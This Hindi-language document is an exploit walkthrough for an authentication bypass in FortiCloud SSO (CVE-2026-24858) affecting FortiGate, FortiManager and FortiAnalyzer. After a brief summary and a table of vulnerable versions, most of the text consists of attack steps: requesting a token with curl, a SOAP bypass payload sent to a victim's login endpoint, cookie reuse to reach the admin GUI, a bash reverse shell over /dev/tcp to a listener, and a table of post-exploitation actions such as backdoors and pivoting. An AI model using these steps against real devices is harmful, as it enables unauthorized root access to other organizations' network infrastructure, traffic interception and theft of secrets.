
CVE-2026-24858 FortiCloud सिंगल साइन ऑन (SSO) — एक फ़ैक्टरी डिफ़ॉल्ट सक्षम सुविधा, जो किसी भी FortiGate/FortiManager/FortiAnalyzer को पंजीकृत करने पर सक्रिय हो जाती है — में एक गंभीर प्रमाणीकरण बायपास दोष शामिल है।
FortiCloud सिंगल-साइन-ऑन (SSO), जो किसी भी FortiGate/FortiManager/FortiAnalyzer को पंजीकृत करने पर फैक्ट्री डिफ़ॉल्ट रूप से सक्षम सुविधा है, में एक गंभीर प्रमाणीकरण-बाईपास दोष है।
जो हमलावर किसी भी FortiCloud खाते (मुफ़्त या सशुल्क) का मालिक है, वह अपने SSO टोकन का पुनः उपयोग करके अन्य ग्राहकों के उपकरणों (नीचे सूचीबद्ध बिल्ड्स ≤) में उनके पासवर्ड जाने बिना लॉग इन कर सकता है।
पोस्ट-एक्सप्लॉइटेशन पूर्ण व्यवस्थापक GUI और रूट शेल एक्सेस प्रदान करता है, जिससे ट्रैफ़िक इंटरसेप्शन, VPN छेड़छाड़, या आंतरिक नेटवर्क में लेटरल मूवमेंट संभव होता है।
तुरंत अपग्रेड करें या पैच होने तक FortiCloud SSO अक्षम करें।
| उत्पाद | कमजोर फर्मवेयर | पैच किया गया |
|---|
| FortiOS | 7.0.0–7.0.18, 7.2.0–7.2.12, 7.4.0–7.4.10, 7.6.0–7.6.5 | ≥ 7.0.19, ≥ 7.2.13, ≥ 7.4.11, ≥ 7.6.6 |
| FortiManager | 7.0.0–7.0.10, 7.2.0–7.2.5, 7.4.0–7.4.9 | समान major.minor+1 |
| FortiAnalyzer | समान रेंज | समान |
हमलावर मशीन
रिवर्स शेल के लिए लिसनर:
nc -lvnp 4444
हमलावर टोकन प्राप्त करें (15 मिनट TTL)
curl -k -X POST https://customerapiauth.fortinet.com/api/v1/auth/token \
-H "Content-Type: application/json" \
-d '{"username":"[email protected]","password":"AttackerPass123"}'
प्रतिक्रिया (स्निपेट):
{"access_token":"eyJ0eXAiOiJKV1QiLCJhbGc...","expires_in":900}
access_token मान कॉपी करें।
बाईपास पेलोड बनाएं
bypass.xml के रूप में सहेजें:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body>
<authRequest>
<serialNumber>FGT80ETK21000000</serialNumber>
<token>eyJ0eXAiOiJKV1QiLCJhbGc...</token>
<action>login</action>
</authRequest>
</soapenv:Body>
</soapenv:Envelope>
पीड़ित को भेजें (उपरोक्त तालिका के अनुसार कोई भी फर्मवेयर ≤)
curl -k -X POST https://<VICTIM-IP>:443/remote/logincheck \
-H "Content-Type: application/xml" \
--data @bypass.xml \
-c cookies.txt
HTTP 200 + Set-Cookie: APSCOOKIE=... → सफलता।
व्यवस्थापक GUI ब्राउज़ करें
ब्राउज़र खोलें या सहेजे गए कुकी के साथ curl का उपयोग करें:
curl -k -b cookies.txt https://<VICTIM-IP>/ng/
→ डैशबोर्ड दिखाई देता है — कोई पासवर्ड नहीं पूछा जाता।
रूट शेल (CLI विजेट)
GUI के अंदर: Dashboard → CLI Console
execute bash
bash-4.4# bash -i >& /dev/tcp/192.168.8.129/4444 0>&1
लिसनर प्राप्त करता है:
root@FGT80ETK21000000:/#
| परिदृश्य | परिणाम |
|---|---|
| केवल-पठन व्यवस्थापक | पूर्ण कॉन्फ़िगरेशन निर्यात करें (VPN सीक्रेट, लोकल-इन पॉलिसी, उपयोगकर्ता हैश)। |
| लेखन व्यवस्थापक | फ़ायरवॉल नियम बदलें, स्थानीय उपयोगकर्ता बनाएं, लॉगिंग अक्षम करें, स्थायी स्क्रिप्ट इम्प्लांट करें। |
| रूट शेल | config.dat डंप करें, HA कुंजियाँ निकालें, आंतरिक सबनेट में पिवट करें, बैकडोर सेवा इम्प्लांट करें। |
| लेटरल मूवमेंट | डिवाइस फ़ुटहोल्ड बन जाता है; VLAN और SSL-VPN टनल विश्वसनीय → गहरा नेटवर्क उल्लंघन। |
| डेटा एक्सफ़िलट्रेशन | सभी ट्रैफ़िक FortiGate से होकर गुजरता है → ट्रांसपेरेंट प्रॉक्सी + सर्टिफिकेट इंजेक्शन। |